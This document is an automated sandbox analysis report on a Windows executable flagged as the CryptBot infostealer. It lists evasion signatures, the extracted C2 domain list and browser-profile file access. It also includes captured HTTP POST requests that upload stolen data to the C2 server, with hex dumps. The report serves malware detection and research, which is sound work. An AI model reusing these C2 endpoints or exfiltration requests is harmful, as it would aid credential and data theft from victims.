Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561927
MD5: 313afbb9950c27be690ce768d37ddb0c
SHA1: a780ef02e5f96460ad7b8a98bcc7ae6ab1f607fa
SHA256: 8a9db782564f0af4f45ce9829e0b2f10024102c13fa28920fce2186f849edf76
Tags: exeuser-Bitsight
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: .1.1home.fvtekk5pn.top Avira URL Cloud: Label: malware
Found malware configuration
Source: file.exe.6456.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["CgPhome.fvtekk5pn.top", ".1.1home.fvtekk5pn.top", "kk5pfvtekk5pn.top", "CgPfvtekk5pn.top", "llowfvtekk5pn.top", "topekk5pn.top", "home.fvtekk5pn.top", "analforeverlovyu.top", "fvtekk5pn.top"]}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_47b82c6a-6
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49747 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: CgPhome.fvtekk5pn.top
Source: Malware configuration extractor URLs: .1.1home.fvtekk5pn.top
Source: Malware configuration extractor URLs: kk5pfvtekk5pn.top
Source: Malware configuration extractor URLs: CgPfvtekk5pn.top
Source: Malware configuration extractor URLs: llowfvtekk5pn.top
Source: Malware configuration extractor URLs: topekk5pn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: fvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------EyiO18jXLMfoFtYCQ6FcHFData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 45 79 69 4f 31 38 6a 58 4c 4d 66 6f 46 74 59 43 51 36 46 63 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 69 77 6f 7a 69 68 61 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 73 03 02 95 78 de 02 7a 89 a6 50 fb 5d 96 2a 1c 6c 51 14 3e b1 c5 34 65 62 f2 b6 7e 99 ac 58 8d 94 58 35 0e b4 91 f2 65 34 2c 2d 98 a2 1b 1f 18 69 13 c5 08 f0 48 e8 81 38 02 28 21 30 9f f7 44 81 bb d7 ee b0 46 67 12 e6 8c 6c 95 5f ce c0 36 d4 14 f2 1d c5 f1 ad 85 64 e9 03 67 28 22 d8 2c 46 9d 3e 82 a3 53 59 4d 65 6b b2 d2 16 45 81 98 7a 46 e2 be 28 19 d5 10 2e b5 6c 12 b1 15 0b 7d 16 88 c9 2d ae 6a 59 58 a2 84 9f 05 2d 22 c8 3e c7 44 26 a1 a8 74 df 27 a4 8b c4 13 cd 6b 9a c6 d4 22 2d 95 cc ee f8 1f 4f 21 85 eb 01 42 ac 32 48 e8 ca 16 6e 8c a4 05 4e 37 7a 05 d5 7c 2e 76 f6 75 7b c4 29 42 fd d8 2d da 0b a7 e3 76 c1 76 1f 4b cd be eb 43 e3 6e 7d 56 8e 8d 91 f6 86 2e eb 16 36 c7 90 21 3f 8e 4d b6 d0 ac 7d fb d7 12 e3 4b 5a c4 d6 b9 f2 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 45 79 69 4f 31 38 6a 58 4c 4d 66 6f 46 74 59 43 51 36 46 63 48 46 2d 2d 0d 0a Data Ascii: --------------------------EyiO18jXLMfoFtYCQ6FcHFContent-Disposition: form-data; name="file"; filename="Jiwozihap.bin"Content-Type: application/octet-stream/sxzP]*lQ>4eb~XX5e4,-iH8(!0DFgl_6dg(",F>SYMekEzF(.l}-jYX-">D&t'k"-O!B2HnN7z|.vu{)B-vvKCn}V.6!?M}KZ--------------------------EyiO18jXLMfoFtYCQ6FcHF--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 89375Content-Type: multipart/form-data; boundary=------------------------HSiptiUlHgU1PEFcSsEDArData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 53 69 70 74 69 55 6c 48 67 55 31 50 45 46 63 53 73 45 44 41 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 69 6e 65 6b 69 71 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 4e 12 3f 0c 93 d9 4a 0c 5a 50 ab 86 b6 3f ea be db f3 e4 af 60 3f 9a 16 df 7b e4 72 8a 27 a6 51 89 3d f1 61 f4 12 30 3e f0 ce 2d bd c3 1c ed 31 c9 14 e7 06 68 85 28 70 cd d1 20 36 2c a3 68 bd a1 ef ec cf f9 e6 e4 11 2e 77 c5 a3 84 e9 3a d2 f3 35 5a 4d e6 de cc a5 8f 3e 10 99 80 0d 98 ce e8 0a f2 a2 cd bb a5 68 ba 79 76 ad ba ed f5 a7 08 c2 ec 35 03 75 90 3f 87 9e 16 a6 e2 1d 4e 35 75 7f dd 7a 34 38 f3 d5 16 fb a3 5c 8a f4 74 56 e1 00 a1 8b bf 6a b8 89 d1 d6 e3 69 a0 e2 13 ec 0c 2b 41 d5 91 ba 63 a1 93 05 42 a1 4f 9d ea 02 62 b4 25 38 5a de 1e 87 57 bb b2 a6 a6 1a 98 15 01 d7 d5 13 03 9d d0 b9 e8 ee a0 00 bf 6c a4 81 c1 0d 58 d7 b3 65 42 61 41 fe 02 e8 3e 65 ae 42 48 29 3d 10 3d 5a bd d1 d3 23 11 5f 2f e5 61 33 4f c8 f5 01 61 87 d6 c4 e7 67 3b 32 d9 71 7d 6b 50 4d df 8e 5e 95 2e 61 06 1e 55 a7 ab ac 8d fb 99 fc 79 77 4b 76 69 b2 38 12 bc b5 03 8e 63 53 5c 72 86 8f 7e 4a 36 57 44 7a 54 ac eb ef 29 18 7b 1c 9f 6c 13 90 f4 4f fb 3e 49 62 be 06 7f 49 1f 85 05 25 f4 69 e8 2a 64 04 d9 af 8a cd 5a d0 93 dc 9d 8a 38 52 25 a6 9b 96 ca c9 05 c7 38 c8 f0 30 be ca 72 45 1e 6b ca fc c8 c5 92 bf f2 15 5a 4c 86 f3 5a d5 f5 92 bc f3 18 09 93 22 d7 54 18 65 87 79 5b c6 1c c7 82 c8 66 0c 58 f4 3b 61 6c c0 12 18 c0 68 f0 eb 77 b0 3e 01 98 5d c7 0f 7c ff c4 00 c8 8c bc c6 a4 99 13 28 7c 77 00 38 45 05 fb a5 68 2e 8a 8f 41 10 7e 7c a7 a4 eb 12 d7 f5 fc fe 0b c7 47 f7 4f 5a dd cd ab 84 03 e1 2b c4 d3 2b 39 8a 16 6b a2 99 31 6a 90 a9 a3 4f aa 66 a0 4b dc be 72 da 00 be 8f e8 1c f4 fa a9 49 19 18 df 21 86 7d aa f8 0a db 67 c4 f4 b0 f4 64 f6 7f 22 6c c2 d5 f9 81 3e 33 9c 1c 3d 1b 79 f2 1b b6 d9 eb 9d 4f 5a 47 38 3a 80 66 5f 36 ab 66 2d 6c 5e e3 87 f9 7c fd ad 7d 10 bc 0b 73 47 c9 e4 de 93 3d 2a 0d 31 ab c6 dd 88 ca fb 74 f0 32 99 db 20 0c ad ea d6 58 f8 52 f4 3a 1d f5 e6 58 4f 1d dd 88 bd d2 af cf 5b 73 f0 12 cc 93 93 75 03 3d d3 f1 a4 6b f3 c7 a5 95 01 e8 10 88 5d d5 86 5a 8c 00 91 1f ce dc b5 85 c6 17 57 30 1a f8 0f 50 da ee 80 0f 23 38 5f d1 48 bb 7a 34 58 5f 8d b9 af f8 83 97 5c b7 78 89 e7 1a b3 11 fd 8f 84 8f aa 83 cc 35 1d c8 8c ee 25 27 3b a1 d1 71 9f 0f 56 b3 6c 4b fa 70 c6 1c a5 5b d8 0c 18 2c 99 0e 51 1a eb 70 89 6d a8 b5 61 91 29 0c 78 17 59 2d 3c d3 14 61 0d 4b 66 e4 c1 a3 ae 9b f7 1e bb a5 b4 d9 2b 35 41 38 9e 75 c4 1f 74 e1 b5 cd f7 d4 f0 cd bf a8 0e 59 6d 22 6e e3 05 ca c4 2b 2a 06 05 23 30 07 37
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DtZnHvYBpgXM1dv&MD=NSnKede7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DtZnHvYBpgXM1dv&MD=NSnKede7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
